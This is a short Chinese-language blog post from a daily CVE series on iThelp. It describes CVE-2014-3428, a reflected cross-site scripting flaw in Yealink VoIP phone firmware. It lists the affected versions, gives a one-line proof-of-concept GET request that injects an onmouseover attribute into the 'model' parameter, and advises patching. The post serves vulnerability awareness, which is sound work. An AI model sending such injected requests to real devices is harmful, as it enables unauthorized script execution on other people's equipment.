iT邦幫忙

DAY 30
0

天天CVE系列 第 30

Yealink VoIP Phones XSS 漏洞 -- CVE-2014-3428

  • 分享至 

  • xImage
  •  

簡介

Yealink VoIP Phones 有 XSS 漏洞,造成可以注入任意 XSS 代碼造成危害。

Warning

  • Firmware Version 28.72.0.2
  • Hardware Version 28.2.0.128.0.0.0

PoC

GET /servlet?jumpto=dsskey&model=%22%20onmouseover%3dprompt%28 1337 %29%20badpuppy%3d%22&p=login&q=loginForm HTTP/1.1

結論

打 Patch 更新 。

參考資料:http://seclists.org/fulldisclosure/2014/Jun/74


上一篇
Yealink VoIP Phones CRLF 漏洞 -- CVE-2014-3427
系列文
天天CVE30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言